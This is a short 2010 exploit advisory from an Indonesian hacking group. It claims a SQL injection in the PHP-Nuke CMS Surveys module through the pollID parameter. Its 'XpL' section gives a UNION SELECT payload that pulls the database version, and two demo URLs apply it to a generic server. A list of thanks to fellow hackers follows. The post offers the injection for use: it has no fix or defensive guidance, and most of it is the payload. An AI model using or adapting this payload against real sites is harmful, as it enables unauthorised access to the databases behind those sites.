43 lines
No EOL
1.9 KiB
Text
43 lines
No EOL
1.9 KiB
Text
#############################################################################################################
|
|
## Tittle :PHPNUKE CMS ( Survey&poll ) SQLi Vulner ##
|
|
## Author : SENOT (selalungantuk_exe@yahoo.com) ##
|
|
## Homepage : http://www.indonesiancoder.com ##
|
|
## Date : Thursday 04 March, 2010 ##
|
|
## Location : - INDONESIA - ##
|
|
#############################################################################################################
|
|
[+] CMS INFO
|
|
[+] Name : PHPNUKE CMS
|
|
[+] Vendor : http://phpnuke.org/
|
|
[+] Download : http://phpnuke.org/modules.php?name=Downloads
|
|
[+] Vulnerability : SQL
|
|
[+] Dork : "Dork Just for newbie"
|
|
#############################################################################################################
|
|
|
|
[ Vulnerable File ]
|
|
|
|
[+] http://127.0.0.1/[senot]/modules.php?name=Surveys&op=results&pollID=[INDONESIANCODER]
|
|
|
|
|
|
[ XpL ]
|
|
|
|
[+] +and+1=2+union+select+1,version(),3,4--
|
|
|
|
|
|
[ DEMO ]
|
|
|
|
[+] http://server/modules.php?name=Surveys&op=results&pollID=5+and+1=2+union+select+1,version%28%29,3,4--
|
|
|
|
[+] http://server/default.php?go=modules.php%3Fname%3DSurveys%26op%3Dresults%26pollID%3D132+and+1=2+union+select+1,version%28%29,3,4--
|
|
|
|
#############################################################################################################
|
|
|
|
[ Thx TO ]
|
|
|
|
[+] INDONESIAN CODER - ServerIsDown - IndonesianHacker - SoldierOfAllah
|
|
[+] kaMtiEz,Tukulesto,M3NW5,arianom,gonzhack,tucker,saint
|
|
[+] B4YU5154,nuxdtyals,qu1ck_51lv3r,Mr.J0k3R,brandal_666
|
|
[+] elv1n4,Mr.fribo,Jack,VycOd,x-shadow,bobyhikaru,deril0101
|
|
[+] ex girlfriend ( you Are my Spirit )
|
|
[+] And you
|
|
|
|
[+] Get the codes and Feel the Soul ( INDONESIANCODER TEAM ) |